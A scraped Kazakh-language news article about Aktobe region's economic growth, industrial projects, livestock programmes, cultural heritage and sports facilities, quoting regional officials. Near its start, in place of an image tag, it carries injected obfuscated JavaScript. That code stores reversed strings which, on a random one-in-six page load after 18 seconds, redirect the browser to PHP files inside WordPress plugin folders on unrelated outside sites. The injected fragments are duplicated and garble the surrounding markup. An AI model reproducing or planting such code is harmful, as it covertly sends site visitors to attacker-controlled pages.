2024-07-27

«Ақтөбе – ел экономикасының локомотиві»

«Ақтөбе – ел экономикасының локомотиві»

6-bet-nazarbaev$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/6-bet-nazarbaev.jpg» height=»157″ width=»198″ />

Елбасы Нұрсұлтан Назарбаев өңірге бір сапары барысында дәл осылай деп баға берген болатын. Содан бері бірнеше жыл өтті, Ақтөбе өз көшбасшылығынан жаңылмай, алға адымдап келеді. Облыс экономикасы жан-жақты. Мұнай, тау-кен өнеркәсібі және металлургия негізгі күші саналса, сол ірі кәсіпорындардың бар қажеттілігін өтейтін шағын және орта бизнестің бағыты айқындалған. Отандық өнімнің үлес салмағы тұрғын үй құрылысы саласында да басым. Мәселен, көпқабатты үйге қажетті кірпіш, цемент, пластикалық құбыр және металл жабынтқыш секілді құрылыс материалдары жергілікті жерде шығарылады. Нәтижесінде үдемелі экономиканың қауқары әлеуметтік хал-ахуалдың жақсаруына оң әсерін тигізіп келеді. Мұның бәрі — бейбітшілігі мен ынтымағы жарасқан тәуелсіз қазақ елінің, оның дамуына өзіндік үлесін қосқан Ақтөбе өңірінің де жеңісі.


ЭКОНОМИКАНЫҢ ЕНШІСІ — ҮДЕМЕЛІ ДАМУ
Онжылдықтың басым бағыттары айқындалып, дамудың жаңа сатысына аяқ басқан мемлекеттің келер күнге жасаған жоспары нақтыланды. Ел экономикасының өрлеу кезеңі Қазақстан үшін жаңа мүмкіндіктерге жол ашады. Әр жыл сайын Президент Нұрсұлтан Назарбаев елдің басым бағыттарын айшықтай түсетін, әлеуметтік-экономикалық ахуалды өрге сүйрейтін Жолдауын халыққа арнап келеді. Биылғы «Болашақтың іргесін бірге қалаймыз» атты Жолдауында тәуелсіз Қазақстанның алдағы даму жолында атқаратын істері нақты көрсетілген. Өткен жылдың өзінде Үдемелі индустриялық-инновациялық даму бағдарламасы бойынша Ақтөбе облысында 24 жоба қатарға енді. Сөйтіп, республикада мұнайлы аймақ көш бастады.
Даму картасына енген жобалар сан қырлы. Олардың ішінде үшінші Жаңажол газ өңдеу зауыты, Ақтөбе ферроқорытпа зауытындағы жоғары көмірсутек шығаратын №4 цех, «Юбилейное» кен орнындағы алтын құрамды кен өңдеуші және кеніш құрылысы, Шилісай кен орны базасындағы фосфорит ұны өндірісі, Мыс және мыс-мырышты кенді өңдейтін №2 байыту фабрикасы, медициналық және өнеркәсіптік рентген аппараттарын шығару орталығы бар. Заманауи медициналық технологияны пайдаланып, республикамыздың барлық аймағын рентген аппаратымен қамтамасыз етіп отырған «Ақтөберентген» АҚ өндірісте дамудың жаңа сатысына көтерілді. Қазір әлемнің 23 елі Ақтөбеде шығарылған аппаратты пайдаланады. Олардың арасында көршілес Қытай мен Ресей, ТМД елдері және Түркия бар. Ресейлік әріптестермен үш бірлескен кәсіпорын құрылды. Машина құрылысы өндірісінде инвестициялық құны 1,5 млрд теңгені құрайтын заманауи компьютерлі томограф жасау іске қосылды десек, мұнда 208 жаңа жұмыс орны ашылды. Кәсіпорынның шығаратын өнімдері таратылмалы және жылжымалы рентгендиагностикалық, флюорографиялық аппараттар, сонымен қатар дәнекерленген қосылыс дефектоскопиясына арналған стационарлық жылжымалы өнеркәсіптік аппараттар номенклатурасы болып табылады. Жоба денсаулық сақтау саласын қазіргі заманғы медициналық рентген аппаратурасымен қамтамасыз етуге мүмкіндік береді.
Ал іске қосылған жобалар қатарындағы Мыс және мыс-мырыш кенін өндіретін №2 байыту фабрикасының жобалық қуаты — жылына 2 млн тонна кен және 227,8 мың тонна мыс-мырыш концентратын өндіру болып табылады. Бұл компания 2004 жылдан бері «Русская медная компания» ЖАҚ-пен мыс және мыс-мырыш кенін өндіретін бес кен орнын кешенді игеру жұмыстарында ауқымды істер атқарып келеді. Кен байыту өндірісінде осы саланың әлемдік көшбасшысы саналатын «Оуткумпу» (Финляндия) компаниясының жоғары технологиялы жабдықтары қолданылады. Компания 2015 жылға дейін «Приорское», «Құндызды», «Лиманное» және «Весенне-Аралчинское» кен орындарында жылына 1,5 млн тонна мыс-мырыш кенін өндіретін ашық кеніш құрылыстарын салуды жоспарлап отыр. Ал 2015 — 2017 жылдар аралығында жылына 2,5 млн тонна мыс-мырыш кенін өндіретін «Приорское», «50 лет Октября» кен орындарында жерасты кенішін салмақ. Осы жобаларды жүзеге асыру мыс шығаруды 15, мырышты 20-40 пайызға арттыруға мүмкіндік береді.
Қазір даму бағдарламасының екінші тынысы ашылды. Жобасы жасалған жаңа зауыттар азық-түлік қауіпсіздігін қамтамасыз етуге, құрылысқа қажетті құрал-жабдықтарды шығаруға, медицина саласына бағытталған. 2011 жылы облыста сомасы 74,2 млрд теңгені құрайтын 27 инвестициялық жоба іске асырылуда. 2,4 мың жаңа жұмыс орнын ашу жоспарланып отыр.
ҮИИД бағдарламасын жүзеге асыру жөніндегі жұмыс екінші жыл қатарынан жүргізілуде және өңірлік жобалардың көпшілігі Ақтөбе қаласында орналасқан. Инвестиция сомасы 11 млрд теңгені құрайды. Олар:
— Өнеркәсіп саласында — 16 инвестициялық жоба, жалпы инвестиция көлемі 9,1 млрд теңге, ашылатын жаңа жұмыс орындарының саны — 930.
— Ауылшаруашылық саласында — 5 инвестициялық жоба, жалпы инвестиция көлемі 1,6 млрд теңге, ашылатын жаңа жұмыс орындарының саны — 267.
— Сауда және қызмет көрсету саласында — 1 инвестициялық жоба, жалпы инвестиция көлемі 500,0 млн теңге, ашылатын жаңа жұмыс орындарының саны — 40.
Өңірде биыл сыйымдылығы 375 тонна мобильді битум сақтау қоймасы және поролон шығару, қайталама поролоннан бұйымдар шығару, дәнекерлеу электродтарын өндіру, жылу оқшауландырылған құбырлар өндірісі, мобильді асфальт-бетон зауыты және қиыршық тас өндіретін зауыт салынып жатыр. «Анди» ЖШС тауарлы-сүт фермасын, «Килико-тун» көкөніс қоймасын, «Әлем Тағам» ЖШС 5 гектарлық аумақты қамтитын жылыжай кешенін, «Велес Актобе ЛТД» ЖШС дәрі-дәрмек шығаратын зауытты жоспарға енгізді.
— Өнеркәсіп өндірісінің көлемі 8,4%-ға өсіп, 906,3 млрд теңгені құрады. Өткен жылдың сәйкес кезеңімен салыстырғанда, мұнай өндіру 5,8%-ға артып, 6,3 млн тонна құрады, ілеспе мұнай газы 19,9%-ға, хром кені 4,5%-ға, мыс кені 23,3%-ға артты. Осы жылдың соңғы 9 айында өңдеу өнеркәсібінің өсу қарқыны 105,2%-ды құрады, соның ішінде жоғары технологиялық өндірістер: мұнай өңдеу өнімдерінің өндірісі 193,2%, машина құрылысы 158,8%, басқа да металл емес минералды өнімдер өндірісі 124,7% өсті, — дейді Кәсіпкерлік және өнеркәсіп басқармасының бастығы Марат Балмұқанов.
Өңірде Үдемелі индустриялық-инновациялық даму бағдарламасы аясында жалпы құны 1,0 триллион теңгені құрайтын 84 инвестициялық жоба 2015 жылға дейін іске қосылады деп жоспарланған. Нәтижесінде металлургия өнімі үш, химиялық саладағы өсім екі еселенеді. Сол кезде металлургиялық және химиялық өнімнің экспорты ұлғаяды.

ШАРУАЛАР ЕТТІ ІРІ ҚАРА САНЫН АРТТЫРЫП ЖАТЫР
Ақтөбе өңіріндегі аудандардың табиғаты бір-біріне ұқсамайды. Соған орай олардың ауыл шаруашылығы саласында атқарар рөлі әртүрлі. Мәртөк, Қарғалы аудандары егін егіп, қамбаны дәнді дақылға толтырса, Шалқар, Байғанин, Ырғыз аудандары мал бағып, алдына салып айдаған ірі қарасы мен тұяқты жануарының санын арттырып келеді. Шаруалар соңғы жылдары мал тұқымын асылдандыруды, етті, сүтті сиыр санын өсіруді алға мақсат етіп қойды.
«Сыбаға» бағдарламасы аясында бірнеше жоба бекітілді. Етті ірі қараны дамыту және ірі қара етінің экспорттық әлеуетін арттыру бағытында 2011 — 2015 жылдары 5,3 мың бас асыл тұқымды ірі қара өсіретін репродуктор-шаруашылық құрылады, 10 мың басқа арналған мал бордақылау алаңы салынады.
— Биыл шаруа қожалықтары 2428 бас ірі қара сатып алды. Бірақ жыл аяғына дейін тағы 150-200 бас мал алынады. «Сыбаға» бағдарламасы бес жылға созылады. Сол жылдар аралығында 15 500 бас ірі қара сатып аламыз деген нақты жоспар да жасалды. Келер жылы 3 мың бас мал алынады. Бағдарлама шарты бойынша несие 7 жылға беріледі және алғашқы жылдары шаруаларға «демалыс» қарастырылған. Ес жинап, әлдену үшін бұл — ең қолайлы тәсіл. Елбасы Нұрсұлтан Назарбаев 60 мың тонна етті экспортқа шығару қажет деп тапсырма берді. Ақтөбе өңірі алдағы жылдары 13-15 мың тонна етті сыртқа шығара алады, — дейді облыстық ауыл шаруашылығы басқармасының бастығы Мұхтар Жұмағазиев.
Үдемелі индустриялық-инновациялық дамудың мемлекеттік бағдарламасы шеңберінде аргоөнеркәсіп кешені бойынша еңбек өнімділігін арттыру, экономиканы нығайту мақсатында өткен жылы 5 ірі және орта кешен іске қосылды. Нәтижесінде «Парижская коммуна» ЖШС құны 3502,1 млн теңге болатын «Бестамақ мал шаруашылығы кешені» құрылысын аяқтаған болатын. 2010 жылы 200 тонна шошқа етін өндірсе, биыл соңғы тоғыз айдың ішінде 3087 тонна еттің 500-ін экспортқа шығарды. Ал «Айс» ЖШС Мәртөк ауданында 1100 бас тауарлы-cүт фермасының алғашқы кезеңін іске қосты. Өткен жылы Венгриядан 198 бас асыл тұқымды сиыр сатылып алынса, бүгінде Германиядан 858 бас қара ала тұқымды қашар әкелінді. 2011 жылдың соңғы тоғыз айында 745 тонна сүт өндірілді. Шетелден жеткен сиырдың әрқайсысынан күніне 4266 келі сүт сауылады. Өткен жылдың тағы бір жаңалығы «Іzer Greenhouse» жылыжай кешенінің ашылуы болды. Бұл өңірдегі жоғары технология мен озық үлгіні кәдеге жаратып салған ең үлкен жылыжай еді. Жалпы аумағы 3 гектар жерді алып жатқан кешенді салу үшін «ҚазАгроҚаржы» АҚ-тан 1,2 млрд теңге қаржы бөлді. Сәуір айында ақтөбеліктер қызанақтың дәмін татып, оң баға беріп жатты. Қазіргі есеп бойынша 800 тоннаға жуық қызанақ сатылған екен. Биыл бағдарлама шеңберінде құны 2,5 млрд теңгені құрайтын 8 жоба мақұлданды. «Қарғалы СДО» ЖШС көкөніс пен жеміс-жидекті газды камерада пірісу қоймасын ашты, ал «Килико тун» мен «Бизнесті дамыту орталығы» серіктестіктері картоп пен түрлі өнім сақтайтын қойманы іске қосты. «Аққұс» құс фабрикасы қайта жарақтандырудан өтіп, «Еділбай Элит» ЖШС асыл тұқымды қой шаруашылығын дамытып жатыр.
Ауыл шаруашылығында тың технологияны, тамшылатып суару әдісін кеңінен пайдалану қолға алынды. Мәселен, Мәртөк ауданының «Родинка» АҚ, Әйтеке би ауданының «Құмқұдық» ЖШС, Хромтаудың «Алтын Дән и К» серіктестігі дәнді дақылдарды ылғалқор сақтау технологиясымен өсіріп, түсімді молайтты.

«ХАН МОЛАСЫ» — ҒАСЫР ЖЕТІСТІГІ

Еліміздің өркендеуіне, жеріміздің көркеюіне өз үлестерін қосқан Алға, Байғанин, Қобда, Ойыл аудандары тәуелсіздіктің 20 жылдығына орай мәдениет және демалыс саябақтарын қайта жаңғыртты. 2006-2010 жылдар аралығында мәдениет ошағының саны 71 бірлікке артып, барлығы 480-ге жеткен болатын. Өткен жылы 24 нысанға құрылыс және қайта қалпына келтіру, күрделі жөндеу жұмыстары жүргізілді. Бұл мақсатқа бюджеттен 1719,0 млн теңге бөлінді.
Жеңістің 65 жылдығына орай ақтөбелік жауынгерлерді мәңгі есте сақтау мақсатында «Естелік кітаптың» электронды нұсқасы шығарылып, оған А.Боровик атындағы ресейлік атаулы сыйлық берілді. Сонымен қатар 37 Кеңес Одағының Батыры мен 9 Даңқ орденінің иегерлеріне арнап, 46 стелладан құралған «Батырлар аллеясы» ашылды. Бәрінен биігі, ең ауқымдысы «Хан моласының» зерттелуі, ғалымдардың құпияны ашуға біртабан жақындауы болып отыр. «Мәдени мұра» ұлттық жобасына сәйкес Ақтөбе қаласында «Еуразия тарихы мен мәдениеті аясындағы Арал — Каспий аймағы» атты ІІ халықаралық ғылыми конференция ұйымдастырылды. Конференцияның мақсаты: Арал — Каспий аймағының Еуразия тарихы мен мәдениетіндегі ерекше маңызын жан-жақты, көп қырлы зерттеулер негізінде көрсету және далалық экспедициялардың, «Хан моласы» қорымын зерттеудің жаңа нәтижелерін жариялау. Шараға 60-тан астам қазақстандық және шетелдік тарихшы-ғалымдар, оқытушылар қатысты. 17 қыркүйек Әйтеке би ауданындағы «Хан моласы» қорымынан алынған сүйектерді қайта жерлеу рәсімі өткізілді. Сонымен қатар жоба аясында облысымызда 1986-1990 жылдары Чернобыль АЭС апатын залалсыздандыруға қатысушы ақтөбеліктерге арналған ескерткіш-белгісі және белгілі ақын, жыршы Кердері Әбубәкірдің 150 жылдығына орай Алға қаласында ақынға арналған ескерткіш мүсіннің салтанатты ашылуы өтті» дейді облыстық Мәдениет басқармасының бастығы Нәзира Табылдина тәуелсіздіктің жемісті жылдарына тоқталып.

ОЛИМПИАДА ҚАЛАШЫҒЫ
Облыста жүйелі түрде жұмыс жасайтын 1 500-ге жуық дене шынықтыру және спорт кешені бар. Соңғы бес жыл ішінде Олимпиада резервін дайындау орталығы, ат спорты мен спорттың қысқы түрлері бойынша балалар мен жасөспірімдер мектебі, теннис пен жекпе-жек күресінің мектебі ашылды. Кейін облыс орталығының іргесіндегі Кірпішті селосында «Олимпиадалық» спорт кешені бой көтерді. Онда теннис орталығы бар. Бір кездері Елбасы Нұрсұлтан Назарбаев кешенді аралап көріп, тіпті қолына ракетка да ұстаған еді. Орталық дене шынықтыру мен спортты дамытуға арналған мемлекеттік бағдарлама аясында салынды. Негізгі мақсат — жоғары деңгейдегі спортшыларды әзірлеу, сонымен бірге тұрғындар арасында теннис ойынын насихаттау. Мұнда төрт жабық, алты ашық теннис корты, үш жүз көрерменге арналған арнайы орын, екі жаттығу залы, сондай-ақ оқу-әдістемелік бөлмелер орналастырылған. Өңірдің белді спортшыларымен кездесуінде Мемлекет басшысы: «Спорт дені сау, салауатты өмір салтын ұстанатын жастарды тәрбиелеп шығаруға көмектеседі. Сондықтан да біз осы бағыттағы қадамдарды қолдаймыз» деп айтқан еді.

www.Kyzmet-gazeti.kz

http://www.aikyn.kz/index.php?option=com_content&task=view&id=10896&Itemid=2

{jcomments on}

Яндекс.Метрика